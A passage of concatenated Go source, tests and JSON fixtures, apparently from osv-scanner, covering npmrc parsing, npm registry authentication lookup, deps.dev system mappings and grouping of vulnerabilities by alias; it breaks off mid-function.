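// Sources are loaded so that later ones override earlier ones:
// builtin, global, user, project, then npm_config_* environment variables.
//
// The locations of the user and global files are themselves read from the
// merged config ("userconfig", "globalconfig", "prefix"), and that merge
// already includes the project file. A project .npmrc can therefore select
// which files are parsed as user and global config, and those values go
// through os.ExpandEnv first. Keep this in mind when workdir is a checkout
// that is not trusted.
func loadNpmrc(workdir string) (NpmrcConfig, error) {
	// Find & parse the 4 npmrc files (builtin, global, user, project) + values set in environment variables
	// https://docs.npmjs.com/cli/v10/configuring-npm/npmrc
	// https://docs.npmjs.com/cli/v10/using-npm/config

	// project npmrc is always in ./.npmrc
	projectFile, _ := filepath.Abs(filepath.Join(workdir, ".npmrc"))
	// TODO: Pass in environment variables so we can sandbox tests
	builtinFile := builtinNpmrc()
	envVarOpts, _ := envVarNpmrc()

	opts := ini.LoadOptions{
		Loose:              true, // ignore missing files
		KeyValueDelimiters: "=",  // default delimiters are "=:", but npmrc uses : in some keys
	}
	// Make use of data overwriting to load the correct values
	fullNpmrc, err := ini.LoadSources(opts, builtinFile, projectFile, envVarOpts)
	if err != nil {
		return nil, err
	}

	// user npmrc is either set as userconfig, or ${HOME}/.npmrc
	// though userconfig cannot be set in the user or global npmrcs
	var userFile string
	switch {
	case fullNpmrc.Section("").HasKey("userconfig"):
		userFile = os.ExpandEnv(fullNpmrc.Section("").Key("userconfig").String())
		// TODO: npm config replaces only ${VAR}, not $VAR
		// and if VAR is unset, it will leave the string as "${VAR}"
	default:
		homeDir, err := os.UserHomeDir()
		if err == nil { // only set userFile if homeDir exists
			userFile = filepath.Join(homeDir, ".npmrc")
		}
	}

	// reload the npmrc files with the user file included
	fullNpmrc, err = ini.LoadSources(opts, builtinFile, userFile, projectFile, envVarOpts)
	if err != nil {
		return nil, err
	}

	var globalFile string
	// global npmrc is either set as globalconfig, prefix/etc/npmrc, ${PREFIX}/etc/npmrc
	// cannot be set within the global npmrc itself
	switch {
	case fullNpmrc.Section("").HasKey("globalconfig"):
		globalFile = os.ExpandEnv(fullNpmrc.Section("").Key("globalconfig").String())
	// TODO: Windows
	case fullNpmrc.Section("").HasKey("prefix"):
		prefix := os.ExpandEnv(fullNpmrc.Section("").Key("prefix").String())
		globalFile, _ = filepath.Abs(filepath.Join(prefix, "etc", "npmrc"))
	case os.Getenv("PREFIX") != "":
		globalFile, _ = filepath.Abs(filepath.Join(os.Getenv("PREFIX"), "etc", "npmrc"))
	default:
		globalFile = filepath.Join("/etc", "npmrc") // TODO: what should this be actually?
	}

	// return final joined config, with correct overriding order
	fullNpmrc, err = ini.LoadSources(opts, builtinFile, globalFile, userFile, projectFile, envVarOpts)
	if err != nil {
		return nil, err
	}

	return fullNpmrc.Section("").KeysHash(), nil
}

// envVarNpmrc collects the npm config settings given as npm_config_*
// environment variables and returns them as ini.Load()-able bytes.
// Variable names are matched case-insensitively and stored in lower case
// with the prefix removed.
func envVarNpmrc() ([]byte, error) {
	// parse npm config settings that were set in environment variables,
	// returns a ini.Load()-able byte array of the values
	iniFile := ini.Empty()
	// npm config environment variables seem to be case-insensitive, interpreted in lowercase
	// get all the matching environment variables and their values
	const envPrefix = "npm_config_"
	for _, env := range os.Environ() {
		// An environment entry is not guaranteed to contain '='. Skip such
		// entries instead of indexing past the end of a one-element split.
		name, v, hasValue := strings.Cut(env, "=")
		if !hasValue {
			continue
		}
		if s, ok := strings.CutPrefix(strings.ToLower(name), envPrefix); ok {
			if _, err := iniFile.Section("").NewKey(s, v); err != nil {
				return nil, err
			}
		}
	}
	var buf bytes.Buffer
	_, err := iniFile.WriteTo(&buf)

	return buf.Bytes(), err
}

// builtinNpmrc returns the absolute path of the npmrc that sits one directory
// above the resolved npm executable, or "" when npm is not on PATH or the path
// cannot be resolved. The file itself is not checked for existence here.
func builtinNpmrc() string {
	// builtin is always at /path/to/npm/npmrc
	npmExec, err := exec.LookPath("npm")
	if err != nil {
		return ""
	}
	// Follow symlinks so the path is relative to the real npm location.
	npmExec, err = filepath.EvalSymlinks(npmExec)
	if err != nil {
		return ""
	}
	npmrc := filepath.Join(filepath.Dir(npmExec), "..", "npmrc")
	npmrc, err = filepath.Abs(npmrc)
	if err != nil {
		return ""
	}

	return npmrc
}

// NpmRegistryAuths handles npm registry authentication in a manner similar to npm-registry-fetch
// https://github.com/npm/npm-registry-fetch/blob/237d33b45396caa00add61e0549cf09fbf9deb4f/lib/auth.js
type NpmRegistryAuths map[string]*HTTPAuthentication

// GetAuth returns the most specific usable credentials configured for uri, or
// nil when uri does not parse or nothing matches.
//
// The lookup key is "//" + host + escaped path, shortened one step at a time
// until only "//" is left. An entry counts as usable only if it has a bearer
// token, a basic-auth value, or both a username and a password.
//
// The URL scheme takes no part in the match: credentials stored for a host are
// returned for http:// and https:// URLs alike, so keeping them off cleartext
// connections is up to the registry URL configuration.
func (auths NpmRegistryAuths) GetAuth(uri string) *HTTPAuthentication {
	parsed, err := url.Parse(uri)
	if err != nil {
		return nil
	}
	regKey := "//" + parsed.Host + parsed.EscapedPath()
	for regKey != "//" {
		if httpAuth, ok := auths[regKey]; ok {
			// Make sure this httpAuth actually has the necessary fields to construct an auth.
			// i.e. it's not valid if only Username or only Password is set
			if httpAuth.BearerToken != "" || httpAuth.BasicAuth != "" || (httpAuth.Username != "" && httpAuth.Password != "") {
				return httpAuth
			}
		}

		// can be either //host/some/path/:_auth or //host/some/path:_auth
		// walk up by removing EITHER what's after the slash OR the slash itself
		var found bool
		if regKey, found = strings.CutSuffix(regKey, "/"); !found {
			regKey = regKey[:strings.LastIndex(regKey, "/")+1]
		}
	}

	return nil
}

// urlPathEscapeLower is url.PathEscape but with lowercase letters in hex codes (matching npm's behaviour)
// e.g. "@reg/pkg" -> "@reg%2fpkg"
func urlPathEscapeLower(s string) string {
	escaped := url.PathEscape(s)
	re := cachedregexp.MustCompile(`%[0-9A-F]{2}`)

	return re.ReplaceAllStringFunc(escaped, strings.ToLower)
}

// NpmRegistryConfig holds the registry URL to use for each package scope and
// the credentials configured per registry URI.
type NpmRegistryConfig struct {
	ScopeURLs map[string]string // map of @scope to registry URL
	Auths     NpmRegistryAuths  // auth info per npm registry URI
}

// LoadNpmRegistryConfig reads the npmrc files that apply to workdir and turns
// them into an NpmRegistryConfig.
func LoadNpmRegistryConfig(workdir string) (NpmRegistryConfig, error) {
	npmrc, err := loadNpmrc(workdir)
	if err != nil {
		return NpmRegistryConfig{}, err
	}

	return ParseNpmRegistryInfo(npmrc), nil
}

// MakeRequest makes the http request to the corresponding npm registry api (with auth).
// urlComponents should be (package) or (package, version)
//
// The registry is chosen by the scope of the first component, falling back to
// the default ("") registry. Components are percent-escaped into a fresh slice,
// so a slice passed by the caller is left unmodified and can be reused.
// An error is returned when no component is given or a component is "." or "..".
func (r NpmRegistryConfig) MakeRequest(ctx context.Context, httpClient *http.Client, urlComponents ...string) (*http.Response, error) {
	if len(urlComponents) == 0 {
		return nil, errors.New("no package specified in npm request")
	}
	// find the corresponding registryInfo for the package's scope
	pkg := urlComponents[0]
	scope := ""
	if strings.HasPrefix(pkg, "@") {
		scope, _, _ = strings.Cut(pkg, "/")
	}
	baseURL, ok := r.ScopeURLs[scope]
	if !ok {
		// no specific rules for this scope, use the default scope
		baseURL = r.ScopeURLs[""]
	}

	escaped := make([]string, len(urlComponents))
	for i, comp := range urlComponents {
		// url.JoinPath cleans "./" and "../" elements out of the result, which
		// would move the request to a different path on the registry host.
		// Neither is a valid package name or version, so refuse them.
		if comp == "." || comp == ".." {
			return nil, errors.New("invalid path component in npm request: " + comp)
		}
		escaped[i] = urlPathEscapeLower(comp)
	}
	reqURL, err := url.JoinPath(baseURL, escaped...)
	if err != nil {
		return nil, err
	}

	// GetAuth returns nil when no credentials match; Get is still called on
	// that nil value, so it is expected to handle a nil receiver.
	return r.Auths.GetAuth(reqURL).Get(ctx, httpClient, reqURL)
}

var npmSupportedAuths = []HTTPAuthMethod{AuthBearer, AuthBasic}

// ParseNpmRegistryInfo extracts registry URLs and credentials from npmrc.
//
// Recognised keys are "registry", "@scope:registry" and, per registry URI,
// ":_authToken", ":_auth", ":username" and ":_password" (base64). The default
// registry is https://registry.npmjs.org/ unless overridden.
//
// Every value is passed through os.ExpandEnv, including registry URLs, so the
// result can contain values taken from the process environment. When the npmrc
// includes a project file that is not trusted, those values can end up in the
// URL of a request sent to a registry named by the same file.
// Registry URLs are stored without any check on their scheme.
func ParseNpmRegistryInfo(npmrc NpmrcConfig) NpmRegistryConfig {
	config := NpmRegistryConfig{
		ScopeURLs: map[string]string{"": "https://registry.npmjs.org/"}, // set the default registry
		Auths:     make(map[string]*HTTPAuthentication),
	}

	// getOrInitAuth returns the auth entry for key, creating it on first use.
	getOrInitAuth := func(key string) *HTTPAuthentication {
		if auth, ok := config.Auths[key]; ok {
			return auth
		}
		auth := &HTTPAuthentication{
			SupportedMethods: npmSupportedAuths,
			AlwaysAuth:       true,
		}
		config.Auths[key] = auth

		return auth
	}

	for name, value := range npmrc {
		var part1, part2 string
		// must split on the last ':' in case e.g. '//localhost:8080/:_auth=xyz'
		if idx := strings.LastIndex(name, ":"); idx >= 0 {
			part1, part2 = name[:idx], name[idx+1:]
		}
		value := os.ExpandEnv(value)
		// TODO: npm config replaces only ${VAR}, not $VAR
		// and if VAR is unset, it will leave the string as "${VAR}"
		switch {
		case name == "registry": // registry=...
			config.ScopeURLs[""] = value
		case part2 == "registry": // @scope:registry=...
			config.ScopeURLs[part1] = value
		case part2 == "_authToken": // //uri:_authToken=...
			getOrInitAuth(part1).BearerToken = value
		case part2 == "_auth": // //uri:_auth=...
			getOrInitAuth(part1).BasicAuth = value
		case part2 == "username": // //uri:username=...
			getOrInitAuth(part1).Username = value
		case part2 == "_password": // //uri:_password=
			password, err := base64.StdEncoding.DecodeString(value)
			if err != nil {
				// TODO: mimic the behaviour of node's Buffer.from(s, 'base64').toString()
				// e.g. ignore invalid characters, stop parsing after first '=', just never throw an error
				break // leaves the switch only; the undecodable password is ignored
			}
			getOrInitAuth(part1).Password = string(password)
		}
	}

	return config
}

================================================
FILE: internal/datasource/npmrc_test.go
================================================
package datasource_test

import (
	"encoding/base64"
	"fmt"
	"net/http"
	"os"
	"path/filepath"
	"testing"

	"github.com/google/osv-scanner/v2/internal/datasource"
	"github.com/google/osv-scanner/v2/internal/testutility"
)

// These tests rely on using 'globalconfig' and 'userconfig' in the package .npmrc to override their default locations.
// It's also possible for environment variables or the builtin npmrc to mess with these tests.
// TODO: Should test the default and other methods of setting the global/user config.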
func createTempNpmrc(t *testing.T, filename string) string { t.Helper() dir := testutility.CreateTestDir(t) file := filepath.Join(dir, filename) f, err := os.Create(file) if err != nil { t.Fatalf("could not create test npmrc file: %v", err) } f.Close() return file } func writeToNpmrc(t *testing.T, file string, lines ...string) { t.Helper() f, err := os.OpenFile(file, os.O_APPEND|os.O_WRONLY, 0666) if err != nil { t.Fatalf("could not write to test npmrc file: %v", err) } defer f.Close() for _, line := range lines { if _, err := fmt.Fprintln(f, line); err != nil { t.Fatalf("could not write to test npmrc file: %v", err) } } } type testNpmrcFiles struct { global string user string project string } func makeBlankNpmrcFiles(t *testing.T) testNpmrcFiles { t.Helper() var files testNpmrcFiles files.global = createTempNpmrc(t, "npmrc") files.user = createTempNpmrc(t, ".npmrc") files.project = createTempNpmrc(t, ".npmrc") writeToNpmrc(t, files.project, "globalconfig="+files.global, "userconfig="+files.user) return files } func checkNpmRegistryRequest(t *testing.T, config datasource.NpmRegistryConfig, urlComponents []string, wantURL string, wantAuth string) { t.Helper() mt := &mockTransport{} httpClient := &http.Client{Transport: mt} resp, err := config.MakeRequest(t.Context(), httpClient, urlComponents...) 
if err != nil { t.Fatalf("error making request: %v", err) } defer resp.Body.Close() if len(mt.Requests) != 1 { t.Fatalf("unexpected number of requests made: %v", len(mt.Requests)) } req := mt.Requests[0] gotURL := req.URL.String() if gotURL != wantURL { t.Errorf("MakeRequest() URL was %s, want %s", gotURL, wantURL) } gotAuth := req.Header.Get("Authorization") if gotAuth != wantAuth { t.Errorf("MakeRequest() Authorization was \"%s\", want \"%s\"", gotAuth, wantAuth) } } func TestLoadNpmRegistryConfig_WithNoRegistries(t *testing.T) { t.Parallel() npmrcFiles := makeBlankNpmrcFiles(t) config, err := datasource.LoadNpmRegistryConfig(filepath.Dir(npmrcFiles.project)) if err != nil { t.Fatalf("could not parse npmrc: %v", err) } if nRegs := len(config.ScopeURLs); nRegs != 1 { t.Errorf("expected 1 npm registry, got %v", nRegs) } checkNpmRegistryRequest(t, config, []string{"@test/package", "1.2.3"}, "https://registry.npmjs.org/@test%2fpackage/1.2.3", "") } func TestLoadNpmRegistryConfig_WithAuth(t *testing.T) { t.Parallel() npmrcFiles := makeBlankNpmrcFiles(t) writeToNpmrc(t, npmrcFiles.project, "registry=https://registry1.test.com", "//registry1.test.com/:_auth=bXVjaDphdXRoCg==", "@test1:registry=https://registry2.test.com", "//registry2.test.com/:_authToken=c3VjaCB0b2tlbgo=", "@test2:registry=https://sub.registry2.test.com", "//sub.registry2.test.com:username=user", "//sub.registry2.test.com:_password=d293Cg==", ) config, err := datasource.LoadNpmRegistryConfig(filepath.Dir(npmrcFiles.project)) if err != nil { t.Fatalf("could not parse npmrc: %v", err) } checkNpmRegistryRequest(t, config, []string{"foo"}, "https://registry1.test.com/foo", "Basic bXVjaDphdXRoCg==") checkNpmRegistryRequest(t, config, []string{"@test0/bar"}, "https://registry1.test.com/@test0%2fbar", "Basic bXVjaDphdXRoCg==") checkNpmRegistryRequest(t, config, []string{"@test1/baz"}, "https://registry2.test.com/@test1%2fbaz", "Bearer c3VjaCB0b2tlbgo=") checkNpmRegistryRequest(t, config, 
[]string{"@test2/test"}, "https://sub.registry2.test.com/@test2%2ftest", "Basic dXNlcjp3b3cK") } // Do not make this test parallel because it calls t.Setenv() func TestLoadNpmRegistryConfig_WithOverrides(t *testing.T) { check := func(t *testing.T, npmrcFiles testNpmrcFiles, wantURLs [5]string) { t.Helper() config, err := datasource.LoadNpmRegistryConfig(filepath.Dir(npmrcFiles.project)) if err != nil { t.Fatalf("could not parse npmrc: %v", err) } checkNpmRegistryRequest(t, config, []string{"pkg"}, wantURLs[0], "") checkNpmRegistryRequest(t, config, []string{"@general/pkg"}, wantURLs[1], "") checkNpmRegistryRequest(t, config, []string{"@global/pkg"}, wantURLs[2], "") checkNpmRegistryRequest(t, config, []string{"@user/pkg"}, wantURLs[3], "") checkNpmRegistryRequest(t, config, []string{"@project/pkg"}, wantURLs[4], "") } npmrcFiles := makeBlankNpmrcFiles(t) writeToNpmrc(t, npmrcFiles.project, "@project:registry=https://project.registry.com") writeToNpmrc(t, npmrcFiles.user, "@user:registry=https://user.registry.com") writeToNpmrc(t, npmrcFiles.global, "@global:registry=https://global.registry.com", "@general:registry=https://general.global.registry.com", "registry=https://global.registry.com", ) wantURLs := [5]string{ "https://global.registry.com/pkg", "https://general.global.registry.com/@general%2fpkg", "https://global.registry.com/@global%2fpkg", "https://user.registry.com/@user%2fpkg", "https://project.registry.com/@project%2fpkg", } check(t, npmrcFiles, wantURLs) // override global in user writeToNpmrc(t, npmrcFiles.user, "@general:registry=https://general.user.registry.com", "registry=https://user.registry.com", ) wantURLs[0] = "https://user.registry.com/pkg" wantURLs[1] = "https://general.user.registry.com/@general%2fpkg" check(t, npmrcFiles, wantURLs) // override global/user in project writeToNpmrc(t, npmrcFiles.project, "@general:registry=https://general.project.registry.com", "registry=https://project.registry.com", ) wantURLs[0] = 
"https://project.registry.com/pkg" wantURLs[1] = "https://general.project.registry.com/@general%2fpkg" check(t, npmrcFiles, wantURLs) // override global/user/project in environment variable t.Setenv("NPM_CONFIG_REGISTRY", "https://environ.registry.com") wantURLs[0] = "https://environ.registry.com/pkg" check(t, npmrcFiles, wantURLs) } func TestNpmRegistryAuths(t *testing.T) { t.Parallel() b64enc := func(s string) string { t.Helper() return base64.StdEncoding.EncodeToString([]byte(s)) } tests := []struct { name string config datasource.NpmrcConfig requestURL string wantAuth string }{ // Auth tests adapted from npm-registry-fetch // https://github.com/npm/npm-registry-fetch/blob/237d33b45396caa00add61e0549cf09fbf9deb4f/test/auth.js { name: "basic_auth", config: datasource.NpmrcConfig{ "//my.custom.registry/here/:username": "user", "//my.custom.registry/here/:_password": b64enc("pass"), }, requestURL: "https://my.custom.registry/here/", wantAuth: "Basic " + b64enc("user:pass"), }, { name: "token_auth", config: datasource.NpmrcConfig{ "//my.custom.registry/here/:_authToken": "c0ffee", "//my.custom.registry/here/:token": "nope", "//my.custom.registry/:_authToken": "7ea", "//my.custom.registry/:token": "nope", }, requestURL: "https://my.custom.registry/here//foo/-/foo.tgz", wantAuth: "Bearer c0ffee", }, { name: "_auth_auth", config: datasource.NpmrcConfig{ "//my.custom.registry/:_auth": "decafbad", "//my.custom.registry/here/:_auth": "c0ffee", }, requestURL: "https://my.custom.registry/here//asdf/foo/bard/baz", wantAuth: "Basic c0ffee", }, { name: "_auth_username:pass_auth", config: datasource.NpmrcConfig{ "//my.custom.registry/here/:_auth": b64enc("foo:bar"), }, requestURL: "https://my.custom.registry/here/", wantAuth: "Basic " + b64enc("foo:bar"), }, { name: "ignore_user/pass_when__auth_is_set", config: datasource.NpmrcConfig{ "//registry/:_auth": b64enc("not:foobar"), "//registry/:username": "foo", "//registry/:_password": b64enc("bar"), }, requestURL: 
"http://registry/pkg/-/pkg-1.2.3.tgz", wantAuth: "Basic " + b64enc("not:foobar"), }, { name: "different_hosts_for_uri_vs_registry", config: datasource.NpmrcConfig{ "//my.custom.registry/here/:_authToken": "c0ffee", "//my.custom.registry/here/:token": "nope", }, requestURL: "https://some.other.host/", wantAuth: "", }, { name: "do_not_be_thrown_by_other_weird_configs", config: datasource.NpmrcConfig{ "@asdf:_authToken": "does this work?", "//registry.npmjs.org:_authToken": "do not share this", "_authToken": "definitely do not share this, either", "//localhost:15443:_authToken": "wrong", "//localhost:15443/foo:_authToken": "correct bearer token", "//localhost:_authToken": "not this one", "//other-registry:_authToken": "this should not be used", "@asdf:registry": "https://other-registry/", }, requestURL: "http://localhost:15443/foo/@asdf/bar/-/bar-1.2.3.tgz", wantAuth: "Bearer correct bearer token", }, // Some extra tests, based on experimentation with npm config { name: "exact_package_path_uri", config: datasource.NpmrcConfig{ "//custom.registry/:_authToken": "less specific match", "//custom.registry/package:_authToken": "exact match", "//custom.registry/package/:_authToken": "no match trailing slash", }, requestURL: "http://custom.registry/package", wantAuth: "Bearer exact match", }, { name: "percent-encoding_case-sensitivity", config: datasource.NpmrcConfig{ "//custom.registry/:_authToken": "expected", "//custom.registry/@scope%2Fpackage:_authToken": "bad config", }, requestURL: "http://custom.registry/@scope%2fpackage", wantAuth: "Bearer expected", }, { name: "require_both_user_and_pass", config: datasource.NpmrcConfig{ "//custom.registry/:_authToken": "fallback", "//custom.registry/foo:username": "user", }, requestURL: "https://custom.registry/foo/bar", wantAuth: "Bearer fallback", }, { name: "don't_inherit_username", config: datasource.NpmrcConfig{ "//custom.registry/:_authToken": "fallback", "//custom.registry/foo:username": "user", 
"//custom.registry/foo/bar:_password": b64enc("pass"), }, requestURL: "https://custom.registry/foo/bar/baz", wantAuth: "Bearer fallback", }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() config := datasource.ParseNpmRegistryInfo(tt.config) // Send off requests to mockTransport to see the auth headers being added. mt := &mockTransport{} httpClient := &http.Client{Transport: mt} resp, err := config.Auths.GetAuth(tt.requestURL).Get(t.Context(), httpClient, tt.requestURL) if err != nil { t.Fatalf("error making request: %v", err) } defer resp.Body.Close() if len(mt.Requests) != 1 { t.Fatalf("unexpected number of requests made: %v", len(mt.Requests)) } header := mt.Requests[0].Header if got := header.Get("Authorization"); got != tt.wantAuth { t.Errorf("authorization header got = \"%s\", want \"%s\"", got, tt.wantAuth) } }) } } ================================================ FILE: internal/datasource/testdata/maven_settings/settings.xml ================================================ server1 user pass server2 ${env.MAVEN_SETTINGS_TEST_USR} ~~${env.MAVEN_SETTINGS_TEST_PWD}~~ ${env.MAVEN_SETTINGS_TEST_SID} ${env.maven_settings_test_usr}-${env.MAVEN_SETTINGS_TEST_NIL} ${env.MAVEN_SETTINGS_TEST_BAD} ================================================ FILE: internal/datasource/testdata/npm_registry/@fake-registry-a.json ================================================ { "name": "@fake-registry/a", "versions": { "1.2.3": { "name": "@fake-registry/a", "version": "1.2.3", "description": "package a", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": { "name": "a author" }, "license": "ISC", "optionalDependencies": { "@fake-registry/b": "^1.0.0", "@fake-registry/e": "^1.0.0" }, "dependencies": { "@fake-registry/b": "^1.0.0", "@fake-registry/e": "^1.0.0" }, "_id": "@fake-registry/a@1.2.3", "_nodeVersion": "10.24.1", "_npmVersion": "7.24.2", "dist": { "integrity": 
"sha512-vIimlnWl8mXXUvJkdeF2KsTIz/3AN3T6Xn7mz0e9w4a0OmVPGJG7M0jL63GkvNYJrvFHLcapfsNksZ/QNKRGhg==", "shasum": "f74ccf91104999d9240c9ea019c6c7872a0429fb", "tarball": "http://localhost:4873/@fake-registry%2fa/-/a-1.2.3.tgz" }, "contributors": [] }, "2.3.4": { "name": "@fake-registry/a", "version": "2.3.4", "description": "package a@2", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": { "name": "a@2 author" }, "license": "MIT", "dependencies": { "@fake-registry/b": "^2.0.0" }, "_id": "@fake-registry/a@2.3.4", "_nodeVersion": "10.24.1", "_npmVersion": "7.24.2", "dist": { "integrity": "sha512-Q1N2Ke+K6e4Vr20qHsjCPMzin4zKNxoo1qkN0MngiZKjNt7UfChaPi7zCtQtrWgH21j9WWR3/J0roepjJJp0iQ==", "shasum": "cdc054c44494751f50508032d557ab7b7fc78703", "tarball": "http://localhost:4873/@fake-registry%2fa/-/a-2.3.4.tgz" }, "contributors": [] } }, "time": { "modified": "2024-03-11T03:25:10.926Z", "created": "2024-03-11T03:25:06.832Z", "1.2.3": "2024-03-11T03:25:06.832Z", "2.3.4": "2024-03-11T03:25:10.926Z" }, "users": {}, "dist-tags": { "latest": "2.3.4" }, "_rev": "6-92a4e77dfe57d1a3", "_id": "@fake-registry/a", "readme": "ERROR: No README data found!", "_attachments": {} } ================================================ FILE: internal/datasource/testdata/npm_registry/fake-package-2.2.2.json ================================================ { "name": "fake-package", "version": "2.2.2", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": "", "license": "ISC", "dependencies": { "a": "^3.0.1", "b": "^2.0.1", "e": "^0.2.33", "f": "npm:g@^2.0.1" }, "devDependencies": { "c": "^1.1.1", "d": "^1.0.2" }, "optionalDependencies": { "e": "^0.2.33", "f": "npm:g@^2.0.1" }, "peerDependencies": { "h": "^1.0.0" }, "bundleDependencies": [ "a" ], "_id": "fake-package@2.2.2", "_nodeVersion": "20.9.0", "_npmVersion": "10.1.0", "dist": { "integrity": 
"sha512-NWvNE9fxykrzSQVr1CSKchzkQr5qwplvgn3O/0JL46qM6BhoGlKRjLiaZYdo1byXJWLGthghOgGpUZiEL04HQQ==", "shasum": "8dc47515da4e67bb794a4c9c7f4750bb4d67c7fc", "tarball": "http://localhost:4873/fake-package/-/fake-package-2.2.2.tgz" }, "contributors": [] } ================================================ FILE: internal/datasource/testdata/npm_registry/fake-package.json ================================================ { "name": "fake-package", "versions": { "1.0.0": { "name": "fake-package", "version": "1.0.0", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": "", "license": "ISC", "_id": "fake-package@1.0.0", "_nodeVersion": "20.9.0", "_npmVersion": "10.1.0", "dist": { "integrity": "sha512-leL6CT1Ld/eHfO5bYq0NQRKBh0fu0WyKGMbZ/IA/wcfDlZpA+5NBARcCciGmswKgdIk/zD+7uRQ8366YwVuoEg==", "shasum": "0d2ff81ce4e33cbb95d45c8ee394c5f90398cf2e", "tarball": "http://localhost:4873/fake-package/-/fake-package-1.0.0.tgz" }, "contributors": [] }, "2.2.2": { "name": "fake-package", "version": "2.2.2", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": "", "license": "ISC", "dependencies": { "a": "^3.0.1", "b": "^2.0.1", "e": "^0.2.33", "f": "npm:g@^2.0.1" }, "devDependencies": { "c": "^1.1.1", "d": "^1.0.2" }, "optionalDependencies": { "e": "^0.2.33", "f": "npm:g@^2.0.1" }, "peerDependencies": { "h": "^1.0.0" }, "bundleDependencies": [ "a" ], "_id": "fake-package@2.2.2", "_nodeVersion": "20.9.0", "_npmVersion": "10.1.0", "dist": { "integrity": "sha512-NWvNE9fxykrzSQVr1CSKchzkQr5qwplvgn3O/0JL46qM6BhoGlKRjLiaZYdo1byXJWLGthghOgGpUZiEL04HQQ==", "shasum": "8dc47515da4e67bb794a4c9c7f4750bb4d67c7fc", "tarball": "http://localhost:4873/fake-package/-/fake-package-2.2.2.tgz" }, "contributors": [] } }, "time": { "modified": "2024-03-20T04:11:53.692Z", "created": "2024-03-20T04:03:14.913Z", "1.0.0": "2024-03-20T04:03:14.913Z", "2.2.2": "2024-03-20T04:11:53.692Z" }, "users": {}, "dist-tags": { "latest": 
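"1.0.0", "version1": "1.0.0", "version2": "2.2.2" }, "_rev": "6-08472a5a07b7c076", "_id": "fake-package", "readme": "ERROR: No README data found!", "_attachments": {} }

================================================
FILE: internal/depsdev/depsdev.go
================================================
// Package depsdev contains constants and mappings for the deps.dev API.
package depsdev

import (
	"github.com/ossf/osv-schema/bindings/go/osvconstants"

	depsdevpb "deps.dev/api/v3"
)

// DepsdevAPI is the URL to the deps.dev API. It is documented at
// docs.deps.dev/api.
const DepsdevAPI = "api.deps.dev:443"

// System maps from a lockfile system to the depsdev API system.
var System = map[osvconstants.Ecosystem]depsdevpb.System{
	osvconstants.EcosystemNPM:      depsdevpb.System_NPM,
	osvconstants.EcosystemNuGet:    depsdevpb.System_NUGET,
	osvconstants.EcosystemCratesIO: depsdevpb.System_CARGO,
	osvconstants.EcosystemGo:       depsdevpb.System_GO,
	osvconstants.EcosystemMaven:    depsdevpb.System_MAVEN,
	osvconstants.EcosystemPyPI:     depsdevpb.System_PYPI,
	osvconstants.EcosystemRubyGems: depsdevpb.System_RUBYGEMS,
}

================================================
FILE: internal/grouper/grouper.go
================================================
// Package grouper groups vulnerabilities by aliases, then sorts them.
package grouper

import (
	"maps"
	"slices"
	"sort"

	"github.com/google/osv-scanner/v2/internal/identifiers"
	"github.com/google/osv-scanner/v2/pkg/models"
)

// hasAliasIntersection reports whether v1 and v2 refer to the same
// vulnerability: they share an alias, or the ID of one is an alias of the other.
func hasAliasIntersection(v1, v2 IDAliases) bool {
	// Check if any aliases intersect.
	for _, alias := range v1.Aliases {
		if slices.Contains(v2.Aliases, alias) {
			return true
		}
	}
	// Check if either IDs are in the others' aliases.
	return slices.Contains(v1.Aliases, v2.ID) || slices.Contains(v2.Aliases, v1.ID)
}

// Group groups vulnerabilities by aliases.
//
// Two entries land in the same group when they are connected by a chain of
// alias intersections. Groups are returned in the order of their first member
// in vulns. Within a group, IDs are sorted with identifiers.IDSortFunc, and
// Aliases is the sorted, de-duplicated union of the members' aliases and IDs.
func Group(vulns []IDAliases) []models.GroupInfo {
	// parent[i] points towards the representative of the group holding vulns[i];
	// an index that is its own parent is a representative.
	parent := make([]int, len(vulns))

	// Initially make every vulnerability its own group.
	for i := range vulns {
		parent[i] = i
	}

	// find returns the representative of i's group, shortening the chain as it goes.
	find := func(i int) int {
		for parent[i] != i {
			parent[i] = parent[parent[i]]
			i = parent[i]
		}

		return i
	}

	// Do a pair-wise (n^2) comparison and merge all intersecting vulns.
	for i := range vulns {
		for j := i + 1; j < len(vulns); j++ {
			if !hasAliasIntersection(vulns[i], vulns[j]) {
				continue
			}
			// Merge whole groups through their representatives. Relabelling only
			// i and j would leave earlier members of either group behind when
			// that group is later joined to one with a smaller index.
			ri, rj := find(i), find(j)
			switch {
			case ri < rj:
				// Use the smaller index as the representative ID.
				parent[rj] = ri
			case rj < ri:
				parent[ri] = rj
			}
		}
	}

	// Extract groups into the final result structure.
	extractedGroups := map[int][]string{}
	extractedAliases := map[int][]string{}
	for i := range vulns {
		gid := find(i)
		extractedGroups[gid] = append(extractedGroups[gid], vulns[i].ID)
		extractedAliases[gid] = append(extractedAliases[gid], vulns[i].Aliases...)
	}

	// Sort by group ID to maintain stable order for tests.
	sortedKeys := slices.AppendSeq(make([]int, 0, len(extractedGroups)), maps.Keys(extractedGroups))
	sort.Ints(sortedKeys)

	result := make([]models.GroupInfo, 0, len(sortedKeys))
	for _, key := range sortedKeys {
		// Sort the strings so they are always in the same order
		slices.SortFunc(extractedGroups[key], identifiers.IDSortFunc)

		// Add IDs to aliases
		extractedAliases[key] = append(extractedAliases[key], extractedGroups[key]...)

		// Dedup entries
		sort.Strings(extractedAliases[key])
		extractedAliases[key] = slices.Compact(extractedAliases[key])

		result = append(result, models.GroupInfo{IDs: extractedGroups[key], Aliases: extractedAliases[key]})
	}

	return result
}

================================================
FILE: internal/grouper/grouper_models.go
================================================
package grouper

import (
	"slices"
	"strings"

	"github.com/google/osv-scanner/v2/internal/identifiers"
	"github.com/ossf/osv-schema/bindings/go/osvschema"
)

// IDAliases is a vulnerability ID together with the other identifiers it is
// known by.
type IDAliases struct {
	ID      string
	Aliases []string
}

// ConvertVulnerabilityToIDAliases builds one IDAliases per vulnerability in c.
// Aliases holds the record's aliases followed by its upstream IDs and, for
// IDs whose first "-"-separated part is "USN", its related IDs.
//
// c is sorted in place with identifiers.MostUpstreamsOrder; the output follows
// that order.
func ConvertVulnerabilityToIDAliases(c []*osvschema.Vulnerability) []IDAliases {
	output := make([]IDAliases, 0, len(c))
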